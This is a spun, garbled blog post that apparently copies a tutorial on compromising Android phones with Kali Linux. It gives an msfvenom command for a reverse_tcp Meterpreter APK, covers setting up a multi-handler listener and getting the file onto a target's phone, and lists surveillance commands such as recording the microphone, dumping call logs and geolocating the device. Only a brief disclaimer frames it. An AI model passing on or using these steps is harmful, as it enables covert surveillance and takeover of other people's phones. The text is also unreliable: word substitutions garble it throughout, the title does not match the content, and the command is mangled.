How To Root Android Phone Using Kali Linux

An Android smartphone is oft a gateway to nigh commercial IoT gadgets. A Nest Smoke alarm is managed through a relevant Android app. Then is a Nest Thermostat to command the temperature. Smart locks, doorbell cams – most all smart devices tin exist accessed from Alexa or other main apps. What if someone were to gain remote access to such an Android telephone? Yous call back this is impossible? For this, nosotros will give a bones demo of how a Kali Linux "metasploit" can be used to create a backdoor entry to your Android phone.

Note: this tutorial is for security researchers and hobbyists. We practice not recommend hacking anyone'south phone without their permission.

Background

Earlier you begin work on Kali Linux, yous starting time need to familiarize yourself with its console terminal.

Information technology readily hosts a comprehensive list of tools which are designed to target a device'southward firmware or operating system.

Here, we will use one of the mutual tools called "MSFVenom" to insert a virus in an Android phone. It generates multiple kinds of payloads based on user selected options. The exploit works beyond many platforms including Windows, Android, OpenBSD, Solaris, JAVA, PHP, and gaming hardware.

Launching an Android Metasploit

The post-obit steps will demonstrate how to download MSFVenom on a Kali Linux system.

Start the last and enter the post-obit control.

msfvenom - p android/meterpreter/reverse_tcp 50            HOST=IP address            LPORT=Number R            >            /root/LOCATION/hackand.apk

Here, the payload is launched using an Exploit extension calleed "Meterpreter".

To determine the IP address of the listener host, open a new panel terminal and enter ifconfig. Ordinarily, port 4444 is assigned for trojans, exploits, and viruses.

In one case the IP address has been determined, go dorsum to the previous screen and enter the details.

The file "hackand.apk" will be saved in the desktop and is the main backdoor exploit to exist used on the Android phone.

In the next step, launch "msfconsole" which is a common penetration testing tool used with Kali Linux. For this, enter service postgresql start followed by msfconsole. PostgreSQL refers to a database where the console has been stored.

Once the penetration tool is prepare, you tin can launch the remaining exploit.

Next, an executable chosen "multi-handler" will exist used.

Refer to the paradigm below for connecting the exploit with the console. The same IP address and port numbers will be used.

In the next stage, the msfvenom exploit will be launched and initialized with a simple exploit command. Now, we take to discover a target which will exist an Android phone.

Connecting Kali Linux Terminal with Android Phone

The hackand.apk file which we downloaded earlier is merely ten KB in size. You will have to find a way to insert the file in the target's telephone. You can transfer the virus using USB or a temporary email service.

Generally, webmail providers such as Gmail or Yahoo will refuse to carry this virus infected file.

Android will warn you before you insert the software. But, information technology just takes less than 20 seconds to complete the installation as you but accept to "ignore the risk and install." This makes the threat somewhat serious if your phone is in unlock mode.

As shown here, a lot of damage can exist done to the telephone including modifying the storage contents, preventing phone from sleep, connecting and disconnecting from Wi-Fi, setting wallpaper, and more than.

Once the APK file is installed, it tin can exist cleverly disguised within the telephone.

At present, you tin use many commands like the following on Kali Linux final to control the phone. You don't accept to remember them actually as the list is available from a simple help option in meterpreter.

• record_mic: recording the microphone
• dump calllog: go the call log
• webcam_chat: kickoff a video conversation
• geolocate: get the phone'southward current location

Most advanced Android phones will prevent this malicious app from getting installed. So, this exploit will generally work with older Android models.

Thoughts

In this tutorial, we saw a basic strategy of using Kali Linux to gain access to an Android smartphone. Fifty-fifty though this is a very elementary exploit, it has great implications in terms of IoT security.

What exercise you remember of Kali Linux exploits? Volition you be more cautious about your phone's security? Do allow us know in the comments.

Is this article useful?

Subscribe to our newsletter!

Our latest tutorials delivered straight to your inbox

How To Root Android Phone Using Kali Linux,

Source: https://www.maketecheasier.com/access-android-phone-using-kali-linux/

Posted by: ericksonfaut1987.blogspot.com

Share this post